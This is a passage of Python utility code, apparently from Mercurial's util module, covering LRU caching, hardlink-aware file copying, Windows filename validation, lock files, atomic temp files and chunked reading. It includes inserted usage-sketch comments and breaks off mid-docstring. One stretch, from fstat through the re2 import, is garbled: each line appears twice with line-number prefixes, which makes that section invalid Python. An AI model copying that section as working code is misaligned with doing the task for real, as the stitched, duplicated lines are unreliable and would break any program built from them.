        By default, the new cache has the same capacity as the existing one.
        But, the cache capacity can be changed as part of performing the
        copy.

        Items in the copy have an insertion/access order matching this
        instance.
        """

        capacity = capacity or self.capacity
        maxcost = maxcost or self.maxcost
        result = lrucachedict(capacity, maxcost=maxcost)

        # We copy entries by iterating in oldest-to-newest order so the copy
        # has the correct ordering.

        # Find the first non-empty entry.
        n = self._head.prev
        while n.key is _notset and n is not self._head:
            n = n.prev

        # We could potentially skip the first N items when decreasing capacity.
        # But let's keep it simple unless it is a performance problem.
        for i in range(len(self._cache)):
            result.insert(n.key, n.value, cost=n.cost)
            n = n.prev

        return result

    def popoldest(self):
        """Remove the oldest item from the cache.

        Returns the (key, value) describing the removed cache entry.
        """
        if not self._cache:
            return

        # Walk the linked list backwards starting at tail node until we hit
        # a non-empty node.
        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        assert n is not None  # help pytype

        key, value = n.key, n.value

        # And remove it from the cache and mark it as empty.
        del self._cache[n.key]
        self.totalcost -= n.cost
        n.markempty()

        return key, value

    def _movetohead(self, node):
        """Mark a node as the newest, making it the new head.

        When a node is accessed, it becomes the freshest entry in the LRU
        list, which is denoted by self._head.

        Visually, let's make ``N`` the new head node (* denotes head):

            previous/oldest <-> head <-> next/next newest

            ----<->--- A* ---<->-----
            |                       |
            E <-> D <-> N <-> C <-> B

        To:

            ----<->--- N* ---<->-----
            |                       |
            E <-> D <-> C <-> B <-> A

        This requires the following moves:

           C.next = D  (node.prev.next = node.next)
           D.prev = C  (node.next.prev = node.prev)
           E.next = N  (head.prev.next = node)
           N.prev = E  (node.prev = head.prev)
           N.next = A  (node.next = head)
           A.prev = N  (head.prev = node)
        """
        head = self._head
        # C.next = D
        node.prev.next = node.next
        # D.prev = C
        node.next.prev = node.prev
        # N.prev = E
        node.prev = head.prev
        # N.next = A
        # It is tempting to do just "head" here, however if node is
        # adjacent to head, this will do bad things.
        node.next = head.prev.next
        # E.next = N
        node.next.prev = node
        # A.prev = N
        node.prev.next = node

        self._head = node

    def _addcapacity(self):
        """Add a node to the circular linked list.

        The new node is inserted before the head node.
        """
        head = self._head
        node = _lrucachenode()
        head.prev.next = node
        node.prev = head.prev
        node.next = head
        head.prev = node
        self._size += 1
        return node

    def _enforcecostlimit(self):
        # This should run after an insertion. It should only be called if total
        # cost limits are being enforced.
        # The most recently inserted node is never evicted.
        if len(self) <= 1 or self.totalcost <= self.maxcost:
            return

        # This is logically equivalent to calling popoldest() until we
        # free up enough cost. We don't do that since popoldest() needs
        # to walk the linked list and doing this in a loop would be
        # quadratic. So we find the first non-empty node and then
        # walk nodes until we free up enough capacity.
        #
        # If we only removed the minimum number of nodes to free enough
        # cost at insert time, chances are high that the next insert would
        # also require pruning. This would effectively constitute quadratic
        # behavior for insert-heavy workloads. To mitigate this, we set a
        # target cost that is a percentage of the max cost. This will tend
        # to free more nodes when the high water mark is reached, which
        # lowers the chances of needing to prune on the subsequent insert.
        targetcost = int(self.maxcost * 0.75)

        n = self._head.prev
        while n.key is _notset:
            n = n.prev

        while len(self) > 1 and self.totalcost > targetcost:
            del self._cache[n.key]
            self.totalcost -= n.cost
            n.markempty()
            n = n.prev
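

# A minimal usage sketch for lrucachedict (illustrative, not part of the
# module). With capacity 2, inserting a third key evicts the least
# recently used one:
#
#     >>> d = lrucachedict(2)
#     >>> d[b'a'] = 1
#     >>> d[b'b'] = 2
#     >>> d[b'a']  # touch b'a' so b'b' becomes the oldest entry
#     1
#     >>> d[b'c'] = 3
#     >>> b'b' in d, b'a' in d
#     (False, True)
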
def lrucachefunc(func):
    '''cache most recent results of function calls'''
    cache = {}
    order = collections.deque()
    if func.__code__.co_argcount == 1:

        def f(arg):
            if arg not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[arg] = func(arg)
            else:
                order.remove(arg)
            order.append(arg)
            return cache[arg]

    else:

        def f(*args):
            if args not in cache:
                if len(cache) > 20:
                    del cache[order.popleft()]
                cache[args] = func(*args)
            else:
                order.remove(args)
            order.append(args)
            return cache[args]

    return f


class propertycache(object):
    def __init__(self, func):
        self.func = func
        self.name = func.__name__

    def __get__(self, obj, type=None):
        result = self.func(obj)
        self.cachevalue(obj, result)
        return result

    def cachevalue(self, obj, value):
        # __dict__ assignment required to bypass __setattr__ (eg: repoview)
        obj.__dict__[self.name] = value


def clearcachedproperty(obj, prop):
    '''clear a cached property value, if one has been set'''
    prop = pycompat.sysstr(prop)
    if prop in obj.__dict__:
        del obj.__dict__[prop]
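

# A minimal usage sketch for propertycache/clearcachedproperty
# (illustrative, not part of the module; ``repoinfo`` is a hypothetical
# class). The first attribute access runs the function and stores the
# result in the instance __dict__, so later accesses bypass the
# descriptor entirely until the cached value is cleared:
#
#     >>> class repoinfo(object):
#     ...     @propertycache
#     ...     def answer(self):
#     ...         print('computing')
#     ...         return 42
#     >>> r = repoinfo()
#     >>> r.answer
#     computing
#     42
#     >>> r.answer  # cached; no recomputation
#     42
#     >>> clearcachedproperty(r, b'answer')
#     >>> r.answer
#     computing
#     42
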
def increasingchunks(source, min=1024, max=65536):
    '''return no less than min bytes per chunk while data remains,
    doubling min after each chunk until it reaches max'''

    def log2(x):
        if not x:
            return 0
        i = 0
        while x:
            x >>= 1
            i += 1
        return i - 1

    buf = []
    blen = 0
    for chunk in source:
        buf.append(chunk)
        blen += len(chunk)
        if blen >= min:
            if min < max:
                min = min << 1
                nmin = 1 << log2(blen)
                if nmin > min:
                    min = nmin
                if min > max:
                    min = max
            yield b''.join(buf)
            blen = 0
            buf = []
    if buf:
        yield b''.join(buf)
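

# A minimal usage sketch (illustrative, not part of the module): with
# small bounds the emitted chunk size doubles from ``min`` toward ``max``:
#
#     >>> list(increasingchunks([b'a'] * 6, min=2, max=4))
#     [b'aa', b'aaaa']
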
def always(fn):
    return True


def never(fn):
    return False


def nogc(func):
    """disable garbage collector

    Python's garbage collector triggers a GC each time a certain number of
    container objects (the number being defined by gc.get_threshold()) are
    allocated even when marked not to be tracked by the collector. Tracking has
    no effect on when GCs are triggered, only on what objects the GC looks
    into. As a workaround, disable GC while building complex (huge)
    containers.

    This garbage collector issue has been fixed in 2.7, but it still affects
    CPython's performance.
    """

    def wrapper(*args, **kwargs):
        gcenabled = gc.isenabled()
        gc.disable()
        try:
            return func(*args, **kwargs)
        finally:
            if gcenabled:
                gc.enable()

    return wrapper


if pycompat.ispypy:
    # PyPy runs slower with gc disabled
    nogc = lambda x: x
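

# A minimal usage sketch for nogc (illustrative, not part of the module;
# ``buildindex`` is a hypothetical function). Decorate a function that
# builds a large container so the cyclic collector stays off for the
# duration of the call (a no-op on PyPy, per the override above):
#
#     >>> @nogc
#     ... def buildindex(n):
#     ...     return {i: (i, i + 1) for i in range(n)}
#     >>> len(buildindex(1000))
#     1000
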
def pathto(root, n1, n2):
    '''return the relative path from one place to another.
    root should use os.sep to separate directories
    n1 should use os.sep to separate directories
    n2 should use "/" to separate directories
    returns an os.sep-separated path.

    If n1 is a relative path, it's assumed it's
    relative to root.
    n2 should always be relative to root.
    '''
    if not n1:
        return localpath(n2)
    if os.path.isabs(n1):
        if os.path.splitdrive(root)[0] != os.path.splitdrive(n1)[0]:
            return os.path.join(root, localpath(n2))
        n2 = b'/'.join((pconvert(root), n2))
    a, b = splitpath(n1), n2.split(b'/')
    a.reverse()
    b.reverse()
    while a and b and a[-1] == b[-1]:
        a.pop()
        b.pop()
    b.reverse()
    return pycompat.ossep.join(([b'..'] * len(a)) + b) or b'.'


def checksignature(func, depth=1):
    '''wrap a function with code to check for calling errors'''

    def check(*args, **kwargs):
        try:
            return func(*args, **kwargs)
        except TypeError:
            if len(traceback.extract_tb(sys.exc_info()[2])) == depth:
                raise error.SignatureError
            raise

    return check
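

# A minimal usage sketch for checksignature (illustrative, not part of
# the module; ``greet`` is a hypothetical function). A TypeError raised
# at call depth ``depth`` is treated as a bad call signature and surfaced
# as error.SignatureError, while TypeErrors from deeper inside the
# function still propagate unchanged:
#
#     >>> def greet(name):
#     ...     return b'hello ' + name
#     >>> checked = checksignature(greet)
#     >>> checked(b'a', b'b')  # wrong arity
#     Traceback (most recent call last):
#       ...
#     mercurial.error.SignatureError
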
# a whitelist of known filesystems where hardlink works reliably
_hardlinkfswhitelist = {
    b'apfs',
    b'btrfs',
    b'ext2',
    b'ext3',
    b'ext4',
    b'hfs',
    b'jfs',
    b'NTFS',
    b'reiserfs',
    b'tmpfs',
    b'ufs',
    b'xfs',
    b'zfs',
}


def copyfile(src, dest, hardlink=False, copystat=False, checkambig=False):
    '''copy a file, preserving mode and optionally other stat info like
    atime/mtime

    checkambig argument is used with filestat, and is useful only if
    destination file is guarded by any lock (e.g. repo.lock or
    repo.wlock).

    copystat and checkambig should be exclusive.
    '''
    assert not (copystat and checkambig)
    oldstat = None
    if os.path.lexists(dest):
        if checkambig:
            oldstat = checkambig and filestat.frompath(dest)
        unlink(dest)
    if hardlink:
        # Hardlinks are problematic on CIFS (issue4546), do not allow hardlinks
        # unless we are confident that dest is on a whitelisted filesystem.
        try:
            fstype = getfstype(os.path.dirname(dest))
        except OSError:
            fstype = None
        if fstype not in _hardlinkfswhitelist:
            hardlink = False
    if hardlink:
        try:
            oslink(src, dest)
            return
        except (IOError, OSError):
            pass  # fall back to normal copy
    if os.path.islink(src):
        os.symlink(os.readlink(src), dest)
        # copytime is ignored for symlinks, but in general copytime isn't needed
        # for them anyway
    else:
        try:
            shutil.copyfile(src, dest)
            if copystat:
                # copystat also copies mode
                shutil.copystat(src, dest)
            else:
                shutil.copymode(src, dest)
            if oldstat and oldstat.stat:
                newstat = filestat.frompath(dest)
                if newstat.isambig(oldstat):
                    # stat of copied file is ambiguous to original one
                    advanced = (
                        oldstat.stat[stat.ST_MTIME] + 1
                    ) & 0x7FFFFFFF
                    os.utime(dest, (advanced, advanced))
        except shutil.Error as inst:
            raise error.Abort(stringutil.forcebytestr(inst))
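

# A minimal usage sketch (illustrative; the paths are hypothetical). With
# hardlink=True the copy is first attempted as a hardlink, but only on a
# whitelisted filesystem, and it silently falls back to a real copy:
#
#     copyfile(b'/repo/.hg/store/data/x', b'/backup/x', hardlink=True)
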
def copyfiles(src, dst, hardlink=None, progress=None):
    """Copy a directory tree using hardlinks if possible."""
    num = 0

    def settopic():
        if progress:
            progress.topic = _(b'linking') if hardlink else _(b'copying')

    if os.path.isdir(src):
        if hardlink is None:
            hardlink = (
                os.stat(src).st_dev == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()
        os.mkdir(dst)
        for name, kind in listdir(src):
            srcname = os.path.join(src, name)
            dstname = os.path.join(dst, name)
            hardlink, n = copyfiles(srcname, dstname, hardlink, progress)
            num += n
    else:
        if hardlink is None:
            hardlink = (
                os.stat(os.path.dirname(src)).st_dev
                == os.stat(os.path.dirname(dst)).st_dev
            )
        settopic()

        if hardlink:
            try:
                oslink(src, dst)
            except (IOError, OSError):
                hardlink = False
                shutil.copy(src, dst)
        else:
            shutil.copy(src, dst)
        num += 1
        if progress:
            progress.increment()

    return hardlink, num


_winreservednames = {
    b'con',
    b'prn',
    b'aux',
    b'nul',
    b'com1',
    b'com2',
    b'com3',
    b'com4',
    b'com5',
    b'com6',
    b'com7',
    b'com8',
    b'com9',
    b'lpt1',
    b'lpt2',
    b'lpt3',
    b'lpt4',
    b'lpt5',
    b'lpt6',
    b'lpt7',
    b'lpt8',
    b'lpt9',
}
_winreservedchars = b':*?"<>|'


def checkwinfilename(path):
    r'''Check that the base-relative path is a valid filename on Windows.
    Returns None if the path is ok, or a UI string describing the problem.

    >>> checkwinfilename(b"just/a/normal/path")
    >>> checkwinfilename(b"foo/bar/con.xml")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/con.xml/bar")
    "filename contains 'con', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/xml.con")
    >>> checkwinfilename(b"foo/bar/AUX/bla.txt")
    "filename contains 'AUX', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/bla:.txt")
    "filename contains ':', which is reserved on Windows"
    >>> checkwinfilename(b"foo/bar/b\07la.txt")
    "filename contains '\\x07', which is invalid on Windows"
    >>> checkwinfilename(b"foo/bar/bla ")
    "filename ends with ' ', which is not allowed on Windows"
    >>> checkwinfilename(b"../bar")
    >>> checkwinfilename(b"foo\\")
    "filename ends with '\\', which is invalid on Windows"
    >>> checkwinfilename(b"foo\\/bar")
    "directory name ends with '\\', which is invalid on Windows"
    '''
    if path.endswith(b'\\'):
        return _(b"filename ends with '\\', which is invalid on Windows")
    if b'\\/' in path:
        return _(b"directory name ends with '\\', which is invalid on Windows")
    for n in path.replace(b'\\', b'/').split(b'/'):
        if not n:
            continue
        for c in _filenamebytestr(n):
            if c in _winreservedchars:
                return (
                    _(
                        b"filename contains '%s', which is reserved "
                        b"on Windows"
                    )
                    % c
                )
            if ord(c) <= 31:
                return _(
                    b"filename contains '%s', which is invalid on Windows"
                ) % stringutil.escapestr(c)
        base = n.split(b'.')[0]
        if base and base.lower() in _winreservednames:
            return (
                _(b"filename contains '%s', which is reserved on Windows")
                % base
            )
        t = n[-1:]
        if t in b'. ' and n not in b'..':
            return (
                _(
                    b"filename ends with '%s', which is not allowed "
                    b"on Windows"
                )
                % t
            )


timer = getattr(time, "perf_counter", None)

if pycompat.iswindows:
    checkosfilename = checkwinfilename
    if not timer:
        timer = time.clock
else:
    # mercurial.windows doesn't have platform.checkosfilename
    checkosfilename = platform.checkosfilename  # pytype: disable=module-attr
    if not timer:
        timer = time.time


def makelock(info, pathname):
    """Create a lock file atomically if possible

    This may leave a stale lock file if symlink isn't supported and signal
    interrupt is enabled.
    """
    try:
        return os.symlink(info, pathname)
    except OSError as why:
        if why.errno == errno.EEXIST:
            raise
    except AttributeError:  # no symlink in os
        pass

    flags = os.O_CREAT | os.O_WRONLY | os.O_EXCL | getattr(os, 'O_BINARY', 0)
    ld = os.open(pathname, flags)
    os.write(ld, info)
    os.close(ld)


def readlock(pathname):
    try:
        return readlink(pathname)
    except OSError as why:
        if why.errno not in (errno.EINVAL, errno.ENOSYS):
            raise
    except AttributeError:  # no symlink in os
        pass
    with posixfile(pathname, b'rb') as fp:
        return fp.read()
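

# A minimal usage sketch (illustrative; the path is hypothetical). On
# platforms with symlinks the lock is a symlink whose target encodes the
# holder, with a regular exclusively-created file as the fallback;
# readlock() recovers the info either way:
#
#     makelock(b'host1:1234', b'.hg/store/lock')
#     assert readlock(b'.hg/store/lock') == b'host1:1234'
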
2112 def fstat(fp):
2112 def fstat(fp):
2113 '''stat file object that may not have fileno method.'''
2113 '''stat file object that may not have fileno method.'''
2114 try:
2114 try:
2115 return os.fstat(fp.fileno())
2115 return os.fstat(fp.fileno())
2116 except AttributeError:
2116 except AttributeError:
2117 return os.stat(fp.name)
2117 return os.stat(fp.name)
2118
2118
2119
2119
2120 # File system features
2120 # File system features
2121
2121
2122
2122
2123 def fscasesensitive(path):
2123 def fscasesensitive(path):
2124 """
2124 """
2125 Return true if the given path is on a case-sensitive filesystem
2125 Return true if the given path is on a case-sensitive filesystem
2126
2126
2127 Requires a path (like /foo/.hg) ending with a foldable final
2127 Requires a path (like /foo/.hg) ending with a foldable final
2128 directory component.
2128 directory component.
2129 """
2129 """
2130 s1 = os.lstat(path)
2130 s1 = os.lstat(path)
2131 d, b = os.path.split(path)
2131 d, b = os.path.split(path)
2132 b2 = b.upper()
2132 b2 = b.upper()
2133 if b == b2:
2133 if b == b2:
2134 b2 = b.lower()
2134 b2 = b.lower()
2135 if b == b2:
2135 if b == b2:
2136 return True # no evidence against case sensitivity
2136 return True # no evidence against case sensitivity
2137 p2 = os.path.join(d, b2)
2137 p2 = os.path.join(d, b2)
2138 try:
2138 try:
2139 s2 = os.lstat(p2)
2139 s2 = os.lstat(p2)
2140 if s2 == s1:
2140 if s2 == s1:
2141 return False
2141 return False
2142 return True
2142 return True
2143 except OSError:
2143 except OSError:
2144 return True
2144 return True
2145
2145
2146
2146
2147 try:
2147 try:
2148 import re2 # pytype: disable=import-error
2148 import re2 # pytype: disable=import-error
2149
2149
2150 _re2 = None
2150 _re2 = None
2151 except ImportError:
2151 except ImportError:
2152 _re2 = False
2152 _re2 = False
2153
2153
2154
2154
class _re(object):
    def _checkre2(self):
        global _re2
        try:
            # check if match works, see issue3964
            _re2 = bool(re2.match(r'\[([^\[]+)\]', b'[ui]'))
        except ImportError:
            _re2 = False

    def compile(self, pat, flags=0):
        '''Compile a regular expression, using re2 if possible

        For best performance, use only re2-compatible regexp features. The
        only flags from the re module that are re2-compatible are
        IGNORECASE and MULTILINE.'''
        if _re2 is None:
            self._checkre2()
        if _re2 and (flags & ~(remod.IGNORECASE | remod.MULTILINE)) == 0:
            if flags & remod.IGNORECASE:
                pat = b'(?i)' + pat
            if flags & remod.MULTILINE:
                pat = b'(?m)' + pat
            try:
                return re2.compile(pat)
            except re2.error:
                pass
        return remod.compile(pat, flags)

    @propertycache
    def escape(self):
        '''Return the version of escape corresponding to self.compile.

        This is imperfect because whether re2 or re is used for a particular
        function depends on the flags, etc, but it's the best we can do.
        '''
        global _re2
        if _re2 is None:
            self._checkre2()
        if _re2:
            return re2.escape
        else:
            return remod.escape


re = _re()

_fspathcache = {}


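# Illustration (assumed, not in the original): the module-level ``re``
# object transparently prefers re2 and falls back to the stdlib engine
# (imported as ``remod``), so callers can stay engine-agnostic.
def _demoutilre():
    pat = re.compile(br'^[a-f0-9]{12,40}$', remod.IGNORECASE)
    return bool(pat.match(b'09F3E003ABCD'))  # True with either engine

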
def fspath(name, root):
    '''Get name in the case stored in the filesystem

    The name should be relative to root, and be normcase-ed for efficiency.

    Note that this function is unnecessary, and should not be
    called, for case-sensitive filesystems (simply because it's expensive).

    The root should be normcase-ed, too.
    '''

    def _makefspathcacheentry(dir):
        return dict((normcase(n), n) for n in os.listdir(dir))

    seps = pycompat.ossep
    if pycompat.osaltsep:
        seps = seps + pycompat.osaltsep
    # Protect backslashes. This gets silly very quickly. (Bytes are
    # immutable, so the result of replace() must be assigned back.)
    seps = seps.replace(b'\\', b'\\\\')
    pattern = remod.compile(br'([^%s]+)|([%s]+)' % (seps, seps))
    dir = os.path.normpath(root)
    result = []
    for part, sep in pattern.findall(name):
        if sep:
            result.append(sep)
            continue

        if dir not in _fspathcache:
            _fspathcache[dir] = _makefspathcacheentry(dir)
        contents = _fspathcache[dir]

        found = contents.get(part)
        if not found:
            # retry "once per directory" per "dirstate.walk" which
            # may take place for each patch of "hg qpush", for example
            _fspathcache[dir] = contents = _makefspathcacheentry(dir)
            found = contents.get(part)

        result.append(found or part)
        dir = os.path.join(dir, part)

    return b''.join(result)


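# Hypothetical sketch: recover the on-disk spelling of a normcased
# relative path on a case-insensitive filesystem. Both arguments must
# already be normcase-ed, per the docstring above.
def _demofspath(root):
    return fspath(normcase(b'readme.txt'), normcase(root))

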
def checknlink(testfile):
    '''check whether hardlink count reporting works properly'''

    # testfile may be open, so we need a separate file for checking to
    # work around issue2543 (or testfile may get lost on Samba shares)
    f1, f2, fp = None, None, None
    try:
        fd, f1 = pycompat.mkstemp(
            prefix=b'.%s-' % os.path.basename(testfile),
            suffix=b'1~',
            dir=os.path.dirname(testfile),
        )
        os.close(fd)
        f2 = b'%s2~' % f1[:-2]

        oslink(f1, f2)
        # nlinks() may behave differently for files on Windows shares if
        # the file is open.
        fp = posixfile(f2)
        return nlinks(f2) > 1
    except OSError:
        return False
    finally:
        if fp is not None:
            fp.close()
        for f in (f1, f2):
            try:
                if f is not None:
                    os.unlink(f)
            except OSError:
                pass


def endswithsep(path):
    '''Check whether path ends with os.sep or os.altsep.'''
    return (
        path.endswith(pycompat.ossep)
        or pycompat.osaltsep
        and path.endswith(pycompat.osaltsep)
    )


def splitpath(path):
    '''Split path by os.sep.
    Note that this function does not use os.altsep because this is
    an alternative to a simple "xxx.split(os.sep)".
    It is recommended to use os.path.normpath() before using this
    function if needed.'''
    return path.split(pycompat.ossep)


def mktempcopy(name, emptyok=False, createmode=None, enforcewritable=False):
    """Create a temporary file with the same contents as name

    The permission bits are copied from the original file.

    If the temporary file is going to be truncated immediately, you
    can use emptyok=True as an optimization.

    Returns the name of the temporary file.
    """
    d, fn = os.path.split(name)
    fd, temp = pycompat.mkstemp(prefix=b'.%s-' % fn, suffix=b'~', dir=d)
    os.close(fd)
    # Temporary files are created with mode 0600, which is usually not
    # what we want. If the original file already exists, just copy
    # its mode. Otherwise, manually obey umask.
    copymode(name, temp, createmode, enforcewritable)

    if emptyok:
        return temp
    try:
        try:
            ifp = posixfile(name, b"rb")
        except IOError as inst:
            if inst.errno == errno.ENOENT:
                return temp
            if not getattr(inst, 'filename', None):
                inst.filename = name
            raise
        ofp = posixfile(temp, b"wb")
        for chunk in filechunkiter(ifp):
            ofp.write(chunk)
        ifp.close()
        ofp.close()
    except:  # re-raises
        try:
            os.unlink(temp)
        except OSError:
            pass
        raise
    return temp


class filestat(object):
    """Helper to exactly detect change of a file

    The 'stat' attribute is the result of 'os.stat()' if the specified
    'path' exists; otherwise it is None. This spares clients of this
    class a preparatory 'exists()' check.
    """

    def __init__(self, stat):
        self.stat = stat

    @classmethod
    def frompath(cls, path):
        try:
            stat = os.stat(path)
        except OSError as err:
            if err.errno != errno.ENOENT:
                raise
            stat = None
        return cls(stat)

    @classmethod
    def fromfp(cls, fp):
        stat = os.fstat(fp.fileno())
        return cls(stat)

    __hash__ = object.__hash__

    def __eq__(self, old):
        try:
            # if ambiguity between stat of new and old file is
            # avoided, comparison of size, ctime and mtime is enough
            # to exactly detect change of a file regardless of platform
            return (
                self.stat.st_size == old.stat.st_size
                and self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
                and self.stat[stat.ST_MTIME] == old.stat[stat.ST_MTIME]
            )
        except AttributeError:
            pass
        try:
            return self.stat is None and old.stat is None
        except AttributeError:
            return False

    def isambig(self, old):
        """Examine whether new (= self) stat is ambiguous against old one

        "S[N]" below means stat of a file at N-th change:

        - S[n-1].ctime  < S[n].ctime: can detect change of a file
        - S[n-1].ctime == S[n].ctime
          - S[n-1].ctime  < S[n].mtime: means natural advancing (*1)
          - S[n-1].ctime == S[n].mtime: is ambiguous (*2)
          - S[n-1].ctime  > S[n].mtime: never occurs naturally (don't care)
        - S[n-1].ctime  > S[n].ctime: never occurs naturally (don't care)

        Case (*2) above means that a file was changed twice or more
        within the same second (= S[n-1].ctime), and comparison of
        timestamps is ambiguous.

        The basic idea to avoid such ambiguity is "advance mtime 1 sec,
        if timestamp is ambiguous".

        But advancing mtime only in case (*2) doesn't work as
        expected, because naturally advanced S[n].mtime in case (*1)
        might be equal to manually advanced S[n-1 or earlier].mtime.

        Therefore, all "S[n-1].ctime == S[n].ctime" cases should be
        treated as ambiguous regardless of mtime, to avoid overlooking
        changes hidden by colliding mtimes.

        Advancing mtime "if isambig(oldstat)" ensures "S[n-1].mtime !=
        S[n].mtime", even if the size of a file isn't changed.
        """
        try:
            return self.stat[stat.ST_CTIME] == old.stat[stat.ST_CTIME]
        except AttributeError:
            return False

    def avoidambig(self, path, old):
        """Change file stat of specified path to avoid ambiguity

        'old' should be the previous filestat of 'path'.

        This skips avoiding ambiguity if the process doesn't have
        appropriate privileges for 'path', and returns False in that
        case.

        Otherwise, this returns True, as "ambiguity is avoided".
        """
        advanced = (old.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
        try:
            os.utime(path, (advanced, advanced))
        except OSError as inst:
            if inst.errno == errno.EPERM:
                # utime() on the file created by another user causes EPERM,
                # if a process doesn't have appropriate privileges
                return False
            raise
        return True

    def __ne__(self, other):
        return not self == other


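# Hedged sketch (added for illustration): the typical client-side dance
# around filestat when rewriting a file under a lock. Names are
# hypothetical; upstream callers live elsewhere in Mercurial.
def _demoavoidambig(path, newcontent):
    oldstat = filestat.frompath(path)
    writefile(path, newcontent)
    newstat = filestat.frompath(path)
    if newstat.isambig(oldstat):
        # same ctime second: nudge mtime so the change stays detectable
        newstat.avoidambig(path, oldstat)

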
class atomictempfile(object):
    '''writable file object that atomically updates a file

    All writes will go to a temporary copy of the original file. Call
    close() when you are done writing, and atomictempfile will rename
    the temporary copy to the original name, making the changes
    visible. If the object is destroyed without being closed, all your
    writes are discarded.

    The checkambig argument of the constructor is used with filestat,
    and is useful only if the target file is guarded by a lock
    (e.g. repo.lock or repo.wlock).
    '''

    def __init__(self, name, mode=b'w+b', createmode=None, checkambig=False):
        self.__name = name  # permanent name
        self._tempname = mktempcopy(
            name,
            emptyok=(b'w' in mode),
            createmode=createmode,
            enforcewritable=(b'w' in mode),
        )

        self._fp = posixfile(self._tempname, mode)
        self._checkambig = checkambig

        # delegated methods
        self.read = self._fp.read
        self.write = self._fp.write
        self.seek = self._fp.seek
        self.tell = self._fp.tell
        self.fileno = self._fp.fileno

    def close(self):
        if not self._fp.closed:
            self._fp.close()
            filename = localpath(self.__name)
            oldstat = self._checkambig and filestat.frompath(filename)
            if oldstat and oldstat.stat:
                rename(self._tempname, filename)
                newstat = filestat.frompath(filename)
                if newstat.isambig(oldstat):
                    # stat of changed file is ambiguous to original one
                    advanced = (oldstat.stat[stat.ST_MTIME] + 1) & 0x7FFFFFFF
                    os.utime(filename, (advanced, advanced))
            else:
                rename(self._tempname, filename)

    def discard(self):
        if not self._fp.closed:
            try:
                os.unlink(self._tempname)
            except OSError:
                pass
            self._fp.close()

    def __del__(self):
        if safehasattr(self, '_fp'):  # constructor actually did something
            self.discard()

    def __enter__(self):
        return self

    def __exit__(self, exctype, excvalue, traceback):
        if exctype is not None:
            self.discard()
        else:
            self.close()


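# Illustrative sketch (assumed usage, not upstream code): atomic rewrite
# via the context-manager protocol defined above. On a clean exit the
# temp copy is renamed over ``name``; on an exception it is discarded
# and the original file is left untouched.
def _demoatomicwrite(name, data):
    with atomictempfile(name, b'wb', checkambig=True) as fp:
        fp.write(data)

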
def unlinkpath(f, ignoremissing=False, rmdir=True):
    """unlink and remove the directory if it is empty"""
    if ignoremissing:
        tryunlink(f)
    else:
        unlink(f)
    if rmdir:
        # try removing directories that might now be empty
        try:
            removedirs(os.path.dirname(f))
        except OSError:
            pass


def tryunlink(f):
    """Attempt to remove a file, ignoring ENOENT errors."""
    try:
        unlink(f)
    except OSError as e:
        if e.errno != errno.ENOENT:
            raise


def makedirs(name, mode=None, notindexed=False):
    """recursive directory creation with parent mode inheritance

    Newly created directories are marked as "not to be indexed by
    the content indexing service", if ``notindexed`` is specified
    for "write" mode access.
    """
    try:
        makedir(name, notindexed)
    except OSError as err:
        if err.errno == errno.EEXIST:
            return
        if err.errno != errno.ENOENT or not name:
            raise
        parent = os.path.dirname(os.path.abspath(name))
        if parent == name:
            raise
        makedirs(parent, mode, notindexed)
        try:
            makedir(name, notindexed)
        except OSError as err:
            # Catch EEXIST to handle races
            if err.errno == errno.EEXIST:
                return
            raise
    if mode is not None:
        os.chmod(name, mode)


def readfile(path):
    with open(path, b'rb') as fp:
        return fp.read()


def writefile(path, text):
    with open(path, b'wb') as fp:
        fp.write(text)


def appendfile(path, text):
    with open(path, b'ab') as fp:
        fp.write(text)


class chunkbuffer(object):
    """Allow arbitrary sized chunks of data to be efficiently read from an
    iterator over chunks of arbitrary size."""

    def __init__(self, in_iter):
        """in_iter is the iterator that's iterating over the input chunks."""

        def splitbig(chunks):
            for chunk in chunks:
                if len(chunk) > 2 ** 20:
                    pos = 0
                    while pos < len(chunk):
                        end = pos + 2 ** 18
                        yield chunk[pos:end]
                        pos = end
                else:
                    yield chunk

        self.iter = splitbig(in_iter)
        self._queue = collections.deque()
        self._chunkoffset = 0

    def read(self, l=None):
        """Read l bytes of data from the iterator of chunks of data.
        Returns less than l bytes if the iterator runs dry.

        If the size parameter ``l`` is omitted, read everything."""
        if l is None:
            return b''.join(self.iter)

        left = l
        buf = []
        queue = self._queue
        while left > 0:
            # refill the queue
            if not queue:
                target = 2 ** 18
                for chunk in self.iter:
                    queue.append(chunk)
                    target -= len(chunk)
                    if target <= 0:
                        break
                if not queue:
                    break

            # The easy way to do this would be to queue.popleft(), modify the
            # chunk (if necessary), then queue.appendleft(). However, for cases
            # where we read partial chunk content, this incurs 2 dequeue
            # mutations and creates a new str for the remaining chunk in the
            # queue. Our code below avoids this overhead.

            chunk = queue[0]
            chunkl = len(chunk)
            offset = self._chunkoffset

            # Use full chunk.
            if offset == 0 and left >= chunkl:
                left -= chunkl
                queue.popleft()
                buf.append(chunk)
                # self._chunkoffset remains at 0.
                continue

            chunkremaining = chunkl - offset

            # Use all of unconsumed part of chunk.
            if left >= chunkremaining:
                left -= chunkremaining
                queue.popleft()
                # offset == 0 is enabled by block above, so this won't merely
                # copy via ``chunk[0:]``.
                buf.append(chunk[offset:])
                self._chunkoffset = 0

            # Partial chunk needed.
            else:
                buf.append(chunk[offset : offset + left])
                self._chunkoffset += left
                left -= chunkremaining

        return b''.join(buf)


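# Worked sketch (illustrative only): re-slice an iterator of ragged
# chunks into fixed-size reads. The byte values are made up.
def _demochunkbuffer():
    buf = chunkbuffer(iter([b'ab', b'cdef', b'g']))
    # -> (b'abc', b'def', b'g')
    return buf.read(3), buf.read(3), buf.read(3)

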
def filechunkiter(f, size=131072, limit=None):
    """Create a generator that produces the data in the file, size
    (default 131072) bytes at a time, up to optional limit (default is
    to read all data). Chunks may be less than size bytes if the
    chunk is the last chunk in the file, or the file is a socket or
    some other type of file that sometimes reads less data than is
    requested."""
    assert size >= 0
    assert limit is None or limit >= 0
    while True:
        if limit is None:
            nbytes = size
        else:
            nbytes = min(limit, size)
        s = nbytes and f.read(nbytes)
        if not s:
            break
        if limit:
            limit -= len(s)
        yield s


class cappedreader(object):
    """A file object proxy that allows reading up to N bytes.

    Given a source file object, instances of this type allow reading up to
    N bytes from that source file object. Attempts to read past the allowed
    limit are treated as EOF.

    It is assumed that I/O is not performed on the original file object
